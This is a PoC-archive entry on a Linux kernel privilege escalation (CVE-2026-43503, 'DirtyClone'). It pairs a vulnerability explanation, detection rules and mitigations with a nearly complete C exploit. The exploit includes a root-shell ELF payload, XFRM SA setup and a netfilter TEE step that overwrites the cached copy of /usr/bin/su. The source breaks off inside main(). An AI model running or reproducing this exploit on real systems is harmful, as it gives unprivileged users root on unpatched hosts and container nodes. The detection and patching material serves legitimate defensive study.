PoC Archive
High CVE-2026-43503 patched

DirtyClone — Linux Kernel LPE via Cloned Packet Page-Cache Overwrite (CVE-2026-43503)

by Hyunwoo Kim (patch author); Eddy Tsalolikhin, Or Peles (JFrog Security Research, exploit writeup); rafaeldtinoco (PoC) · 2026-06-28

Metadata

Date Added:          2026-06-28
Last Updated:        2026-06-28
Author / Researcher: Hyunwoo Kim (patch author); Eddy Tsalolikhin, Or Peles (JFrog Security Research, exploit writeup); rafaeldtinoco (PoC)
CVE / Advisory:      CVE-2026-43503
Category:            binary
Severity:            High
CVSS Score:          8.8 (CVSSv3)
Status:              Weaponized
Tags:                LPE, Linux kernel, netfilter, TEE, IPsec, XFRM, page-cache, file-backed memory, DirtyFrag, skb, privilege escalation, C, in-the-wild
Related:             CVE-2026-31431, CVE-2026-43284, CVE-2026-43500, CVE-2026-46300

Affected Target

Software / System:       Linux kernel (netfilter TEE / __pskb_copy_fclone())
Versions Affected:       All kernels before commit 48f6a5356a33 (v7.1-rc5, May 21 2026); Linux 6.1–6.12 confirmed; 5.15 and 5.10 LTS under investigation
Language / Platform:     C, Linux
Authentication Required: Yes (local unprivileged shell)
Network Access Required: Local only (loopback IPsec tunnel)

Summary

DirtyClone (CVE-2026-43503, CVSS 8.8) is the fourth member of the DirtyFrag family of Linux kernel local privilege escalation vulnerabilities. Each member shares the same root failure: file-backed page-cache memory is exposed to network packet operations, and a missing flag along the code path turns a zero-copy performance optimisation into an arbitrary write primitive.

DirtyClone’s specific path runs through the netfilter TEE target, which clones outbound packets via __pskb_copy_fclone(). That function drops the SKBFL_SHARED_FRAG flag, the safety bit that the original DirtyFrag mitigation relies on. With the flag gone, the kernel’s in-place IPsec ESP decryption (esp_input() / AES-CBC) overwrites page-cache pages that the attacker spliced from a privileged binary such as /usr/bin/su. The binary on disk is never touched; the modification lives only in memory, which hides it from on-disk file-integrity checks and makes it disappear on reboot.

JFrog Security Research (Eddy Tsalolikhin, Or Peles) published the first public exploit walkthrough on June 25, 2026. A working C PoC was released by rafaeldtinoco. The patch (commit 48f6a5356a33) was merged May 21 into Linux v7.1-rc5 and covers __pskb_copy_fclone(), skb_shift(), and additional frag-transfer helpers.


Vulnerability Details

Root Cause

The Linux kernel’s zero-copy networking allows file-backed page-cache pages to serve as packet fragment data. Whenever the kernel moves such fragments between socket buffers, it must propagate the SKBFL_SHARED_FRAG flag to signal that those pages are shared with the page cache and must not be modified in place.

__pskb_copy_fclone(), called by the netfilter TEE target to duplicate outbound packets, fails to copy this flag to the cloned skb. A second affected helper, skb_shift(), has the same omission. Once the flag is absent, IPsec ESP processing treats the fragment as ordinary packet data and decrypts it in place — overwriting the page-cache copy of whatever file the attacker pinned there.

The broader CVE covers all frag-transfer helpers where the contract was not honoured; the demonstrated exploit path centres on TEE + __pskb_copy_fclone().

Family Timeline

Date          | CVE                            | Name       | Path
Late Apr 2026 | CVE-2026-31431                 | Copy Fail  | algif_aead / AF_ALG AEAD splice: 4-byte write
May 7 2026    | CVE-2026-43284, CVE-2026-43500 | DirtyFrag  | IPsec ESP + RxRPC: full write primitive
May 13 2026   | CVE-2026-46300                 | Fragnesia  | skb_try_coalesce() flag-drop bypass of DirtyFrag patch
May 21 2026   | CVE-2026-43503                 | DirtyClone | __pskb_copy_fclone() + skb_shift() via netfilter TEE

Attack Vector

  1. Obtain CAP_NET_ADMIN: On Debian and Fedora (unprivileged user namespaces enabled by default), a local user creates a new user and network namespace to gain the capability inside it. Ubuntu 24.04+ with AppArmor namespace restrictions blocks this step, requiring an alternative capability source.

  2. Pin privileged binary into page cache: Open /usr/bin/su read-only and splice() its pages into a pipe, so the pipe buffer references the page-cache pages themselves.

  3. Wire pages into a network packet: Splice the pipe data into a UDP socket so the kernel creates a socket buffer (skb) whose fragment directly references the page-cache pages.

  4. Configure loopback IPsec tunnel: Set up an XFRM/IPsec ESP tunnel in the namespace with an AES-CBC key and IV chosen to produce a known, attacker-controlled plaintext after decryption.

  5. Add netfilter TEE rule: Install an iptables TEE rule that duplicates packets leaving the loopback interface, invoking __pskb_copy_fclone() on each one. The cloned skb loses SKBFL_SHARED_FRAG.

  6. Trigger in-place decrypt: Transmit the crafted packet. IPsec processes the clone, esp_input() decrypts the fragment in place, and the decrypted (attacker-chosen) bytes are written into the page-cache copy of /usr/bin/su.

  7. Gain root: Execute su. The patched in-memory binary skips authentication and spawns a root shell.

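The disk binary is unchanged; the write affects only the kernel’s cached copy. File-integrity monitoring and dm-verity, which validate on-disk contents, see nothing, and the overwrite is not a file write that audit rules watching the target path would record. A system reboot restores the original binary.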
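Because the change lives only in the cached copy, one check a defender might try is to hash the file twice: once through the normal buffered path and once with a direct read that asks the kernel to bypass the page cache. The sketch below is not from the original write-up. It assumes GNU dd (for iflag=direct), sha256sum, and a filesystem that supports O_DIRECT; the function name cache_matches_disk is hypothetical.

```shell
#!/bin/sh
# Compare the buffered (page-cache) view of a file with a direct-from-disk read.
# Exit status: 0 = hashes match, 1 = hashes differ, 2 = direct read unavailable.
# Assumption: GNU dd's iflag=direct opens the file with O_DIRECT.
cache_matches_disk() {
    cmd_file=$1
    # Probe first so a dd failure is not hidden inside the pipeline below.
    if ! dd if="$cmd_file" of=/dev/null iflag=direct bs=4096 2>/dev/null; then
        return 2
    fi
    # Buffered read: served from the page cache when the pages are resident.
    cmd_cached=$(sha256sum < "$cmd_file" | cut -d' ' -f1)
    # Direct read: requests data from the backing store instead.
    cmd_direct=$(dd if="$cmd_file" iflag=direct bs=4096 2>/dev/null | sha256sum | cut -d' ' -f1)
    [ "$cmd_cached" = "$cmd_direct" ]
}
```

A call such as `cache_matches_disk /usr/bin/su` that returns 1 would be worth investigating. A return of 0 does not prove a clean system, since the cached page may already have been evicted.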

Impact

  • Full local privilege escalation to root (uid=0) from any unprivileged shell.
  • Modification is in-memory only — invisible to file-integrity tools and self-cleaning on reboot.
  • In container/namespace environments, page cache is shared at host level: a write from inside a namespace affects every process on the host.
  • Highest-risk environments: multi-tenant servers, CI runners, container hosts (Docker, Podman), Kubernetes nodes where untrusted users can run workloads.

Environment / Lab Setup

OS:       Debian 12 / Ubuntu 22.04 / Fedora 41 (default namespace config)
Kernel:   < v7.1-rc5 (before commit 48f6a5356a33)
Attacker: Local unprivileged user
Tools:    gcc, make, iptables/nft, iproute2 (ip xfrm)

Setup Steps

git clone https://github.com/rafaeldtinoco/security
cd security/exploits/dirtyclone
make
./dirtyclone

Proof of Concept

Step-by-Step Reproduction

  1. Verify namespace access — Confirm unprivileged user namespaces are enabled.

    cat /proc/sys/kernel/unprivileged_userns_clone   # Debian: 1
    cat /proc/sys/user/max_user_namespaces            # > 0
    
  2. Build exploit

    cd security/exploits/dirtyclone && make
    
  3. Run as unprivileged user

    ./dirtyclone
    
  4. Confirm escalation

    id
    # uid=0(root) gid=0(root) groups=0(root)
    

Exploit Code

See dirtyclone.c in the upstream repo at rafaeldtinoco/security/exploits/dirtyclone/.

The exploit:

  • Creates a user namespace to acquire CAP_NET_ADMIN.
  • Opens /usr/bin/su and splices its page-cache pages into a pipe with splice(); vmsplice() supplies the ESP header that precedes them.
  • Configures a loopback XFRM/IPsec ESP tunnel with attacker-chosen AES-CBC key/IV.
  • Installs a netfilter TEE rule to trigger __pskb_copy_fclone().
  • Transmits the crafted skb; esp_input() overwrites page-cache bytes in place.
  • Executes the patched su binary to obtain a root shell.
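The TEE step in the list above depends on the xt_TEE kernel module, and loaded modules are visible host-wide in /proc/modules. On a host that has no legitimate TEE rules, a loaded xt_TEE is therefore a possible indicator worth a look. It is not proof of compromise. The helper below is a minimal sketch and not part of the original PoC; the function name module_loaded and its optional second argument (a file in /proc/modules format, useful for testing) are hypothetical.

```shell
#!/bin/sh
# Report whether a kernel module appears in a /proc/modules-style listing.
# Exit status: 0 = listed, 1 = not listed, 2 = listing unreadable.
module_loaded() {
    ml_name=$1
    ml_list=${2:-/proc/modules}
    [ -r "$ml_list" ] || return 2
    # Each line begins with the module name followed by a space.
    grep -q "^${ml_name} " "$ml_list"
}
```

For example, `module_loaded xt_TEE && echo "xt_TEE is loaded"` prints a notice only when the module is present.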

Expected Output

[*] Creating user namespace...
[*] Configuring loopback XFRM tunnel...
[*] Installing netfilter TEE rule...
[*] Splicing /usr/bin/su into page cache...
[*] Triggering __pskb_copy_fclone() path...
[*] Page-cache overwrite complete.
[*] Executing patched su...
uid=0(root) gid=0(root) groups=0(root)

Detection & Indicators of Compromise

auditd rules:

-a always,exit -F arch=b64 -S vmsplice -k dirtyfrag_family
-a always,exit -F arch=b64 -S unshare -F a0&0x10000000 -k userns_create
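
The unshare rule is meant to catch callers that request CLONE_NEWUSER (0x10000000). Callers often OR that bit with other namespace flags, for example CLONE_NEWNET (0x40000000), so a bit test is more reliable than comparing the whole flag word against one value. The snippet below is a small sketch of that test for use when triaging logged a0 values; the function name has_newuser is hypothetical.

```shell
#!/bin/sh
CLONE_NEWUSER=0x10000000   # value from <linux/sched.h>

# Succeeds when the given unshare()/clone() flag word has CLONE_NEWUSER set.
has_newuser() {
    [ $(( $1 & $CLONE_NEWUSER )) -ne 0 ]
}
```

Audit records print a0 as bare hex digits, so add a 0x prefix before passing a logged value, as in `has_newuser 0x50000000`.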

Mitigation (without patching):

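sysctl -w kernel.unprivileged_userns_clone=0    # Debian/Ubuntu kernels
sysctl -w user.max_user_namespaces=0            # kernels without that knob (e.g. Fedora); disables user namespaces for all users
echo "kernel.unprivileged_userns_clone=0" >> /etc/sysctl.d/99-namespace.conf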
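
To confirm that the setting took effect, a quick check of the relevant sysctl files might look like the sketch below. It is a heuristic under stated assumptions: it only reads kernel.unprivileged_userns_clone (a Debian-family knob that is absent elsewhere) and user.max_user_namespaces, and it knows nothing about AppArmor or SELinux restrictions. The function name userns_status and its optional root argument are hypothetical.

```shell
#!/bin/sh
# Print "blocked" or "exposed" for a sysctl tree (default: /proc/sys).
userns_status() {
    us_root=${1:-/proc/sys}
    us_max=$us_root/user/max_user_namespaces
    us_clone=$us_root/kernel/unprivileged_userns_clone
    # A limit of 0 prevents creation of any user namespace.
    if [ -r "$us_max" ] && [ "$(cat "$us_max")" = "0" ]; then
        echo blocked
        return 0
    fi
    # Debian-family switch for unprivileged callers; missing on other kernels.
    if [ -r "$us_clone" ] && [ "$(cat "$us_clone")" = "0" ]; then
        echo blocked
        return 0
    fi
    echo exposed
}
```

Running `userns_status` with no argument inspects the live system. An "exposed" result means only that neither sysctl blocks namespace creation.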

Remediation

Patch:        Update to Linux kernel ≥ v7.1-rc5 (commit 48f6a5356a33) or apply distro backport
Workaround:   sysctl kernel.unprivileged_userns_clone=0 (Debian/Ubuntu kernels) or user.max_user_namespaces=0 (kernels without that knob, e.g. Fedora); Ubuntu 24.04+ AppArmor profile already blocks default path
Verification: uname -r, then confirm the kernel includes commit 48f6a5356a33 via distro changelog or git log
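
As a first pass before reading changelogs, the release string can be compared against v7.1-rc5. The sketch below assumes mainline-style strings such as 7.1.0-rc4 or 6.1.0-18-amd64. It cannot see distro backports, so a "predates" result on a vendor kernel still needs the changelog check described above. The function name release_predates_fix is hypothetical.

```shell
#!/bin/sh
# Exit status: 0 = release predates v7.1-rc5, 1 = at or after it,
# 2 = release string could not be parsed.
release_predates_fix() {
    rp_rel=$1
    case $rp_rel in *.*) ;; *) return 2 ;; esac
    rp_major=${rp_rel%%.*}
    rp_rest=${rp_rel#*.}
    rp_minor=${rp_rest%%[!0-9]*}
    case $rp_major in ''|*[!0-9]*) return 2 ;; esac
    [ -n "$rp_minor" ] || return 2
    # Extract N from a "-rcN" suffix, if present.
    rp_rc=
    case $rp_rel in
        *-rc[0-9]*) rp_rc=${rp_rel##*-rc}; rp_rc=${rp_rc%%[!0-9]*} ;;
    esac
    [ "$rp_major" -lt 7 ] && return 0
    [ "$rp_major" -eq 7 ] && [ "$rp_minor" -lt 1 ] && return 0
    if [ "$rp_major" -eq 7 ] && [ "$rp_minor" -eq 1 ] && [ -n "$rp_rc" ] && [ "$rp_rc" -lt 5 ]; then
        return 0
    fi
    return 1
}
```

Typical use is `release_predates_fix "$(uname -r)" && echo "check for a backport of 48f6a5356a33"`.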

References

dirtyclone.c
// SPDX-License-Identifier: GPL-2.0
//
// DirtyClone (CVE-2026-43503) — Linux LPE page-cache write reproducer.
//
// ---------------------------------------------------------------------------
// What this is
// ---------------------------------------------------------------------------
//
// DirtyClone is the fourth public member of the DirtyPipe/DirtyFrag family:
// it forces the kernel to run an in-place ESP (IPsec) decrypt over a
// file-backed page-cache page the attacker only has read access to, mutating
// that page in RAM. The chosen AES-CBC key/IV make the decrypt write
// attacker-controlled bytes, so e.g. /usr/bin/su is rewritten with a tiny
// setuid(0)+execve("/bin/sh") ELF and invoking it yields root.
//
// ---------------------------------------------------------------------------
// Why it is a *new* CVE and not just DirtyFrag
// ---------------------------------------------------------------------------
//
// The original DirtyFrag ESP fix (commit f4c50a4034e6, "set SKBFL_SHARED_FRAG
// for spliced UDP packets") marks any skb that carries spliced, file-backed
// page-cache frags. esp_input() then sees the flag and copies the data before
// decrypting, so the page cache is no longer touched. That defeats the direct
// splice -> ESP-in-UDP path used by DirtyFrag.
//
// DirtyClone launders the flag away through skb *cloning*. The netfilter TEE
// target duplicates an outbound packet inside the kernel:
//
//     TEE target -> nf_dup_ipv4() -> __pskb_copy_fclone()
//
// __pskb_copy_fclone() fails to propagate SKBFL_SHARED_FRAG to the clone. The
// clone therefore still references the same physical page-cache page but is no
// longer marked as shared/file-backed, so esp_input() decrypts it in place —
// exactly the primitive the splice fix was supposed to remove.
//
// Fixed by 48f6a5356a33 (mainline 2026-05-21, first tag v7.1-rc5), which
// propagates the flag across the clone path. Vulnerable window: any kernel
// that has f4c50a4034e6 but not 48f6a5356a33 (mainline v7.1-rc1..rc4).
//
// ---------------------------------------------------------------------------
// Exploitation outline (per byte word)
// ---------------------------------------------------------------------------
//
//   1. unshare(CLONE_NEWUSER | CLONE_NEWNET) -> CAP_NET_ADMIN in a private
//      net namespace, loopback up.
//   2. Configure the TEE gateway address on lo and install the netfilter TEE
//      rule on the mangle/OUTPUT chain so every ESP-in-UDP packet is cloned.
//   3. Install an XFRM ESP transport SA via NETLINK_XFRM (cbc(aes)/hmac), one
//      per 4-byte target word, carrying the desired output word in seq_hi.
//   4. splice() the target file's page-cache page into an ESP-in-UDP packet
//      and send it. The TEE clone (flag stripped) is decrypted in place,
//      writing the chosen word over the page cache.
//
// The cryptographic word-selection trick (payload encoded in the SA seq_hi
// field) is inherited verbatim from the DirtyFrag ESP variant; only the
// flag-laundering TEE step is new.
//
// ---------------------------------------------------------------------------

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <arpa/inet.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>

#include <linux/if.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>

#ifndef UDP_ENCAP
    #define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
    #define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef SOL_UDP
    #define SOL_UDP 17
#endif

#define ENC_PORT     4500
#define SEQ_VAL      200
#define REPLAY_SEQ   100
#define TARGET_PATH  "/usr/bin/su"
#define PATCH_OFFSET 0    /* Overwrite the whole ELF starting at file[0]. */
#define PAYLOAD_LEN  192  /* Bytes of shell_elf to write (48 triggers). */
#define ENTRY_OFFSET 0x78 /* Shellcode entry inside the new ELF. */

#define TEE_GATEWAY "10.99.0.2" /* TEE clone destination, configured on lo. */

static int g_verbose = 0;

#define SLOG(fmt, ...)                                                       \
    do {                                                                     \
        if (g_verbose)                                                       \
            fprintf(stderr, "[dc] " fmt "\n", ##__VA_ARGS__);                \
    } while (0)

/*
 * 192-byte minimal x86_64 root-shell ELF (identical to the DirtyFrag ESP
 * payload). _start at 0x400078: setgid(0); setuid(0); setgroups(0, NULL);
 * execve("/bin/sh", NULL, ["TERM=xterm", NULL]).
 */
static const uint8_t shell_elf[PAYLOAD_LEN] = {
    0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0,
    0xb0, 0x6a, 0x0f, 0x05, 0xb0, 0x69, 0x0f, 0x05, 0xb0, 0x74, 0x0f, 0x05, 0x6a, 0x00,
    0x48, 0x8d, 0x05, 0x12, 0x00, 0x00, 0x00, 0x50, 0x48, 0x89, 0xe2, 0x48, 0x8d, 0x3d,
    0x12, 0x00, 0x00, 0x00, 0x31, 0xf6, 0x6a, 0x3b, 0x58, 0x0f, 0x05, 0x54, 0x45, 0x52,
    0x4d, 0x3d, 0x78, 0x74, 0x65, 0x72, 0x6d, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73,
    0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};

static int
write_proc(const char *path, const char *buf)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;
    int n = write(fd, buf, strlen(buf));
    close(fd);
    return n;
}

static int
run_cmd(const char *fmt, ...)
{
    char    cmd[256];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(cmd, sizeof(cmd), fmt, ap);
    va_end(ap);
    int rc = system(cmd);
    SLOG("cmd: %s -> %d", cmd, rc);
    return rc;
}

static void
setup_userns_netns(void)
{
    uid_t real_uid = getuid();
    gid_t real_gid = getgid();
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        SLOG("unshare: %s", strerror(errno));
        exit(1);
    }
    write_proc("/proc/self/setgroups", "deny");
    char map[64];
    snprintf(map, sizeof(map), "0 %u 1", real_uid);
    if (write_proc("/proc/self/uid_map", map) < 0) {
        SLOG("uid_map: %s", strerror(errno));
        exit(1);
    }
    snprintf(map, sizeof(map), "0 %u 1", real_gid);
    if (write_proc("/proc/self/gid_map", map) < 0) {
        SLOG("gid_map: %s", strerror(errno));
        exit(1);
    }
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) {
        SLOG("socket: %s", strerror(errno));
        exit(1);
    }
    struct ifreq ifr;
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
    if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) {
        SLOG("SIOCGIFFLAGS: %s", strerror(errno));
        exit(1);
    }
    ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
    if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) {
        SLOG("SIOCSIFFLAGS: %s", strerror(errno));
        exit(1);
    }
    close(s);
}

/*
 * The DirtyClone-specific step: make the kernel clone every ESP-in-UDP packet
 * so the clone (with SKBFL_SHARED_FRAG stripped by __pskb_copy_fclone) is the
 * skb that reaches esp_input(). The TEE target performs the clone; the gateway
 * address is configured on lo so the clone is delivered locally and re-enters
 * the ESP-in-UDP receive path matched by our XFRM SA.
 *
 * NOTE: exact routing/selector tuning for the clone to land on the ESP path is
 * the live iteration target on the vulnerable kernel; the recipe below mirrors
 * the JFrog write-up (mangle/OUTPUT TEE on udp/4500 -> gateway on lo).
 */
static int
setup_tee_clone(void)
{
    // Control switch: DIRTYCLONE_NO_TEE skips the clone step so the direct
    // splice path can be tested in isolation (negative control on a kernel
    // that carries the DirtyFrag splice fix).
    if (getenv("DIRTYCLONE_NO_TEE")) {
        SLOG("TEE step skipped (DIRTYCLONE_NO_TEE set)");
        return 0;
    }
    run_cmd("ip addr add %s/32 dev lo 2>/dev/null", TEE_GATEWAY);
    run_cmd("ip route add %s/32 dev lo 2>/dev/null", TEE_GATEWAY);
    if (run_cmd("iptables -t mangle -A OUTPUT -p udp --dport %d "
                "-j TEE --gateway %s",
                ENC_PORT, TEE_GATEWAY) != 0) {
        SLOG("TEE rule install failed (xt_TEE missing?)");
        return -1;
    }
    return 0;
}

static void
put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)
{
    struct rtattr *rta = (struct rtattr *) ((char *) nlh + NLMSG_ALIGN(nlh->nlmsg_len));
    rta->rta_type      = type;
    rta->rta_len       = RTA_LENGTH(len);
    memcpy(RTA_DATA(rta), data, len);
    nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);
}

static int
add_xfrm_sa(uint32_t spi, uint32_t patch_seqhi)
{
    int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (sk < 0)
        return -1;
    struct sockaddr_nl nl = {.nl_family = AF_NETLINK};
    if (bind(sk, (struct sockaddr *) &nl, sizeof(nl)) < 0) {
        close(sk);
        return -1;
    }

    char             buf[4096] = {0};
    struct nlmsghdr *nlh       = (struct nlmsghdr *) buf;
    nlh->nlmsg_type            = XFRM_MSG_NEWSA;
    nlh->nlmsg_flags           = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_pid             = getpid();
    nlh->nlmsg_seq             = 1;
    nlh->nlmsg_len             = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));

    struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *) NLMSG_DATA(nlh);
    xs->id.daddr.a4             = inet_addr("127.0.0.1");
    xs->id.spi                  = htonl(spi);
    xs->id.proto                = IPPROTO_ESP;
    xs->saddr.a4                = inet_addr("127.0.0.1");
    xs->family                  = AF_INET;
    xs->mode                    = XFRM_MODE_TRANSPORT;
    xs->replay_window           = 0;
    xs->reqid                   = 0x1234;
    xs->flags                   = XFRM_STATE_ESN;
    xs->lft.soft_byte_limit     = (uint64_t) -1;
    xs->lft.hard_byte_limit     = (uint64_t) -1;
    xs->lft.soft_packet_limit   = (uint64_t) -1;
    xs->lft.hard_packet_limit   = (uint64_t) -1;
    xs->sel.family              = AF_INET;
    xs->sel.prefixlen_d         = 32;
    xs->sel.prefixlen_s         = 32;
    xs->sel.daddr.a4            = inet_addr("127.0.0.1");
    xs->sel.saddr.a4            = inet_addr("127.0.0.1");

    {
        char alg_buf[sizeof(struct xfrm_algo_auth) + 32];
        memset(alg_buf, 0, sizeof(alg_buf));
        struct xfrm_algo_auth *aa = (struct xfrm_algo_auth *) alg_buf;
        strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
        aa->alg_key_len   = 32 * 8;
        aa->alg_trunc_len = 128;
        memset(aa->alg_key, 0xAA, 32);
        put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, alg_buf, sizeof(alg_buf));
    }
    {
        char alg_buf[sizeof(struct xfrm_algo) + 16];
        memset(alg_buf, 0, sizeof(alg_buf));
        struct xfrm_algo *ea = (struct xfrm_algo *) alg_buf;
        strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
        ea->alg_key_len = 16 * 8;
        memset(ea->alg_key, 0xBB, 16);
        put_attr(nlh, XFRMA_ALG_CRYPT, alg_buf, sizeof(alg_buf));
    }
    {
        struct xfrm_encap_tmpl enc;
        memset(&enc, 0, sizeof(enc));
        enc.encap_type  = UDP_ENCAP_ESPINUDP;
        enc.encap_sport = htons(ENC_PORT);
        enc.encap_dport = htons(ENC_PORT);
        enc.encap_oa.a4 = 0;
        put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));
    }
    {
        char esn_buf[sizeof(struct xfrm_replay_state_esn) + 4];
        memset(esn_buf, 0, sizeof(esn_buf));
        struct xfrm_replay_state_esn *esn = (struct xfrm_replay_state_esn *) esn_buf;
        esn->bmp_len                      = 1;
        esn->oseq                         = 0;
        esn->seq                          = REPLAY_SEQ;
        esn->oseq_hi                      = 0;
        esn->seq_hi                       = patch_seqhi;
        esn->replay_window                = 32;
        put_attr(nlh, XFRMA_REPLAY_ESN_VAL, esn_buf, sizeof(esn_buf));
    }

    if (send(sk, nlh, nlh->nlmsg_len, 0) < 0) {
        close(sk);
        return -1;
    }
    char rbuf[4096];
    int  n = recv(sk, rbuf, sizeof(rbuf), 0);
    if (n < 0) {
        close(sk);
        return -1;
    }
    struct nlmsghdr *rh = (struct nlmsghdr *) rbuf;
    if (rh->nlmsg_type == NLMSG_ERROR) {
        struct nlmsgerr *e = NLMSG_DATA(rh);
        if (e->error) {
            close(sk);
            return -1;
        }
    }
    close(sk);
    return 0;
}

static int
do_one_write(const char *path, off_t offset, uint32_t spi)
{
    int sk_recv = socket(AF_INET, SOCK_DGRAM, 0);
    if (sk_recv < 0)
        return -1;
    int one = 1;
    setsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
    struct sockaddr_in sa_d = {
        .sin_family = AF_INET,
        .sin_port   = htons(ENC_PORT),
        .sin_addr   = {inet_addr("127.0.0.1")},
    };
    if (bind(sk_recv, (struct sockaddr *) &sa_d, sizeof(sa_d)) < 0) {
        close(sk_recv);
        return -1;
    }
    int encap = UDP_ENCAP_ESPINUDP;
    if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
        close(sk_recv);
        return -1;
    }
    int sk_send = socket(AF_INET, SOCK_DGRAM, 0);
    if (sk_send < 0) {
        close(sk_recv);
        return -1;
    }
    if (connect(sk_send, (struct sockaddr *) &sa_d, sizeof(sa_d)) < 0) {
        close(sk_send);
        close(sk_recv);
        return -1;
    }
    int file_fd = open(path, O_RDONLY);
    if (file_fd < 0) {
        close(sk_send);
        close(sk_recv);
        return -1;
    }

    int pfd[2];
    if (pipe(pfd) < 0) {
        close(file_fd);
        close(sk_send);
        close(sk_recv);
        return -1;
    }

    uint8_t hdr[24];
    *(uint32_t *) (hdr + 0) = htonl(spi);
    *(uint32_t *) (hdr + 4) = htonl(SEQ_VAL);
    memset(hdr + 8, 0xCC, 16);

    struct iovec iov_h = {.iov_base = hdr, .iov_len = sizeof(hdr)};
    if (vmsplice(pfd[1], &iov_h, 1, 0) != (ssize_t) sizeof(hdr)) {
        close(file_fd);
        close(pfd[0]);
        close(pfd[1]);
        close(sk_send);
        close(sk_recv);
        return -1;
    }
    loff_t  off = offset;
    ssize_t s   = splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE);
    if (s != 16) {
        close(file_fd);
        close(pfd[0]);
        close(pfd[1]);
        close(sk_send);
        close(sk_recv);
        return -1;
    }
    /* Send the ESP-in-UDP packet. The mangle/OUTPUT TEE rule clones it; the
     * clone loses SKBFL_SHARED_FRAG and esp_input() decrypts it in place over
     * the spliced page-cache page. */
    s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);
    usleep(150 * 1000);

    close(file_fd);
    close(pfd[0]);
    close(pfd[1]);
    close(sk_send);
    close(sk_recv);
    return s == 40 ? 0 : -1;
}

static int
verify_byte(const char *path, off_t offset, uint8_t want)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    uint8_t got;
    if (pread(fd, &got, 1, offset) != 1) {
        close(fd);
        return -1;
    }
    close(fd);
    return got == want ? 0 : -1;
}

static int
corrupt_su(void)
{
    setup_userns_netns();
    if (setup_tee_clone() < 0)
        return -1;
    usleep(100 * 1000);

    /* Install one xfrm SA per 4-byte chunk; each carries the desired payload
     * word in its seq_hi field. */
    for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
        uint32_t spi   = 0xDEADBE10 + i;
        uint32_t seqhi = ((uint32_t) shell_elf[i * 4 + 0] << 24) |
                         ((uint32_t) shell_elf[i * 4 + 1] << 16) |
                         ((uint32_t) shell_elf[i * 4 + 2] << 8) |
                         ((uint32_t) shell_elf[i * 4 + 3]);
        if (add_xfrm_sa(spi, seqhi) < 0) {
            SLOG("add_xfrm_sa #%d failed", i);
            return -1;
        }
    }
    SLOG("installed %d xfrm SAs", PAYLOAD_LEN / 4);

    for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
        uint32_t spi = 0xDEADBE10 + i;
        off_t    off = PATCH_OFFSET + i * 4;
        if (do_one_write(TARGET_PATH, off, spi) < 0) {
            SLOG("do_one_write #%d at off=0x%lx failed", i, (long) off);
            return -1;
        }
    }
    SLOG("wrote %d bytes to %s starting at 0x%x", PAYLOAD_LEN, TARGET_PATH, PATCH_OFFSET);
    return 0;
}

int
main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "-v") || !strcmp(argv[i], "--verbose"))
            g_verbose = 1;
    }
    if (getenv("DIRTYCLONE_VERBOSE"))
        g_verbose = 1;

    pid_t cpid = fork();
    if (cpid < 0)
        return 1;
